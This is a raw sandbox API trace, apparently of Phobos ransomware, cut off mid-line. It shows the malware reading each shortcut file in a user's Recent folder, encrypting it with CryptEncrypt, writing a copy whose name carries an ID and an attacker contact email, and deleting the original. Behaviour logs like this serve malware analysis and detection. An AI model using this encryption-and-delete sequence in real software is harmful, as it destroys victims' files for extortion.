SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.785] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.786] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.786] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.786] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1ab7, lpOverlapped=0x0) returned 1 [0200.858] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1ac0, dwBufLen=0x1ac0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1ac0) returned 1 [0200.858] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1ac0, lpOverlapped=0x0) returned 1 [0200.859] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.859] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.859] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.859] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.859] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.859] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.859] CloseHandle (hObject=0xac) returned 1 [0200.859] CloseHandle (hObject=0x160) returned 1 [0200.859] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk")) returned 1 [0200.860] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.903] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2545) returned 1 [0200.903] CloseHandle (hObject=0x124) returned 1 [0200.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk")) returned 0x20 [0200.903] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.903] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.904] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.905] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.905] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.905] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9f1, lpOverlapped=0x0) returned 1 [0200.906] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa00, dwBufLen=0xa00 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa00) returned 1 [0200.906] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa00, lpOverlapped=0x0) returned 1 [0200.907] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.907] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.907] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.907] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.907] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.907] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.907] CloseHandle (hObject=0x124) returned 1 [0200.907] CloseHandle (hObject=0x178) returned 1 [0200.907] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkPk.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkpk.lnk")) returned 1 [0200.908] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.909] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3845) returned 1 [0200.909] CloseHandle (hObject=0x178) returned 1 [0200.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk")) returned 0x20 [0200.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.909] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.909] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.910] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.910] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.910] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf05, lpOverlapped=0x0) returned 1 [0200.911] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf10, dwBufLen=0xf10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xf10) returned 1 [0200.911] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf10, lpOverlapped=0x0) returned 1 [0200.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.912] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.912] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0200.912] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.912] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0200.912] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.912] CloseHandle (hObject=0x178) returned 1 [0200.912] CloseHandle (hObject=0x124) returned 1 [0200.912] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LJMGEsp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ljmgesp.lnk")) returned 1 [0200.913] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.914] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2659) returned 1 [0200.914] CloseHandle (hObject=0x124) returned 1 [0200.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk")) returned 0x20 [0200.914] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.914] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.914] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.915] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.915] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.915] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa63, lpOverlapped=0x0) returned 1 [0200.917] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70, dwBufLen=0xa70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa70) returned 1 [0200.917] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa70, lpOverlapped=0x0) returned 1 [0200.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.918] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.918] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.918] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.918] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.918] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.918] CloseHandle (hObject=0x124) returned 1 [0200.918] CloseHandle (hObject=0x178) returned 1 [0200.918] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lNtq1T kmstods.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lntq1t kmstods.lnk")) returned 1 [0200.919] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.919] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1040) returned 1 [0200.919] CloseHandle (hObject=0x178) returned 1 [0200.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk")) returned 0x20 [0200.920] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.920] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.920] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.921] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.921] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.921] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x410, lpOverlapped=0x0) returned 1 [0200.922] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420, dwBufLen=0x420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x420) returned 1 [0200.922] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x420, lpOverlapped=0x0) returned 1 [0200.923] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0200.923] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.923] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.923] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.923] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.923] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.923] CloseHandle (hObject=0x178) returned 1 [0200.923] CloseHandle (hObject=0x124) returned 1 [0200.923] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\LpkaXf84Y3y05eg.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\lpkaxf84y3y05eg.lnk")) returned 1 [0200.924] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.926] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=722) returned 1 [0200.926] CloseHandle (hObject=0x124) returned 1 [0200.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk")) returned 0x20 [0200.926] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\lTqEzeGMbsz.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ltqezegmbsz.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.926] SetFilePointerEx (in: 